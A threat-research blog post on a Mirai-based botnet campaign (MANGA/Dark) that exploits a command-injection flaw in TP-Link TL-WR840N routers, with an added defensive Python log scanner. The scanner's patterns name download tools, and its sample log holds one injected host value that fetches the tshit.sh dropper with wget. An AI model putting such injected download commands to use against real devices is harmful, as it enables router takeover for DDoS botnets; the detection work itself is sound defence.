Last week, our FortiGuard Labs team encountered a malware sample that is currently being distributed in the wild targeting TP-Link wireless routers. It leverages a post-authentication remote code execution (RCE) vulnerability that had been disclosed barely two weeks earlier.
As it turns out, it is an updated variant of the MANGA campaign (also known as Dark), which distributes samples built from Mirai’s published source code. This Mirai-based Distributed Denial of Service (DDoS) botnet campaign is one that FortiGuard Labs has been actively monitoring. The campaign originally piqued our interest because it updates its list of targeted vulnerabilities far more continuously than other campaigns we have seen so far.
TP-Link has already released updated firmware for the affected hardware version, and users are strongly encouraged to update their devices.
This post details how this threat leverages the new vulnerability to take over the affected devices and ways to protect users from these attacks.
Exploiting a New Vulnerability
This Mirai-based botnet campaign is referred to as MANGA because of the token string it used to include in its SSH/telnet commands. It is also referred to as Dark due to the filenames used for its binaries (e.g., Dark.arm, dark.mips, etc.).
By exploiting recently published vulnerabilities, this malware campaign capitalizes on the gap between the disclosure of a vulnerability and the application of a patch to compromise IoT devices. This gives it a higher potential for spreading, making it more prolific than similar botnets. The latest addition to its constantly growing list of targeted vulnerabilities affects TP-Link home wireless routers, specifically the TL-WR840N EU (V5) model.
The vulnerability it targets, assigned CVE-2021-41653, was only discovered on November 12 of this year. Barely two weeks later, on November 22, a sample from the MANGA malware campaign was seen actively exploiting it in the wild.
Kamilló Matek discusses the full details of this vulnerability in this article. In summary, a vulnerable host parameter allows authenticated users to execute arbitrary commands on the target device.
In this case, it is being exploited to force vulnerable devices to download and execute a malicious script, tshit.sh, which then downloads the main binary payloads, as discussed in the next section.
To accomplish this, the following requests are sent to the device:
It is important to emphasize that this exploitation requires authentication to succeed, so it is crucial that users change their default credentials.
As with Mirai’s normal infection routine, the executed shell script downloads the main payload binaries for different architectures and platforms and executes them blindly on the victim’s system. In addition, it prevents other botnets from taking over the device by blocking connections to commonly targeted ports.
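As an added illustration of what a defender can look for in a router's or upstream proxy's HTTP access log, the following example (written for this post, not Fortinet's, TP-Link's, or the IPS signatures listed below) flags requests whose host parameter carries shell metacharacters or download tooling, and requests that reference the tshit.sh dropper. The endpoint path, the assumption that host is a query parameter, and the log lines are all constructed for the example; the page does not name the real endpoint.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Shell metacharacters and download tooling that should never appear in a hostname field.
INJECTION_RE = re.compile(r"[;|&`$(){}]|\b(?:wget|curl|tftp|chmod)\b", re.IGNORECASE)
# Dropper script name reported in the post.
DROPPER_RE = re.compile(r"tshit\.sh", re.IGNORECASE)
# Loosely parses a combined-style access-log line: client, request line, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def host_param_values(target):
    """Return every value of a query parameter named 'host' (assumed name); parse_qs percent-decodes."""
    return parse_qs(urlsplit(target).query, keep_blank_values=True).get("host", [])


def classify_request(line):
    """Return a finding dict for a suspicious request line, or None for benign/unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = []
    if any(INJECTION_RE.search(v) for v in host_param_values(m.group("target"))):
        reasons.append("shell metacharacters or download tool in host parameter")
    if DROPPER_RE.search(unquote_plus(m.group("target"))):
        reasons.append("reference to tshit.sh dropper")
    if not reasons:
        return None
    return {"client": m.group("client"), "status": m.group("status"), "reasons": reasons}


def scan(lines):
    """Run classify_request over an iterable of log lines and keep only the findings."""
    return [r for r in (classify_request(l) for l in lines) if r]


# Constructed sample lines (not real traffic): a benign lookup of a hostname, an injected
# host value fetching the dropper, and an unrelated page request. /cgi is a placeholder path.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Nov/2021:10:00:00 +0000] "GET /cgi?host=example.com HTTP/1.1" 200 512',
    '198.51.100.7 - - [22/Nov/2021:10:00:05 +0000] "GET /cgi?host=example.com%3Bwget%20http%3A%2F%2F203.0.113.5%2Ftshit.sh HTTP/1.1" 200 512',
    '192.0.2.10 - - [22/Nov/2021:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Because exploitation is post-authentication, a hit from a client that also shows a successful login shortly before is the higher-priority case to triage.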
The malware then waits for a command from its Command-and-Control (C2) server to perform different variations of a Denial-of-Service (DoS) attack.
Fortinet customers are protected by the following:
- The following generic FortiGuard IPS signatures were able to detect this attack before this vulnerability was disclosed:
- The FortiGuard Web Filtering Service blocks downloaded URLs and identified C2s.
- The FortiGuard AntiVirus service detects and blocks this threat as Linux/Mirai and ELF/Mirai.
Through our active monitoring, we encountered a new variant of the Mirai-based botnet campaign referred to as MANGA or Dark, targeting a recently published RCE vulnerability in TP-Link wireless routers.
Throughout its life, this ongoing campaign has been very active in targeting newly discovered vulnerabilities. In fact, right before this blog was published, our monitoring system encountered yet another updated variant that we are currently investigating.
FortiGuard Labs will continue monitoring this campaign and provide updates as necessary.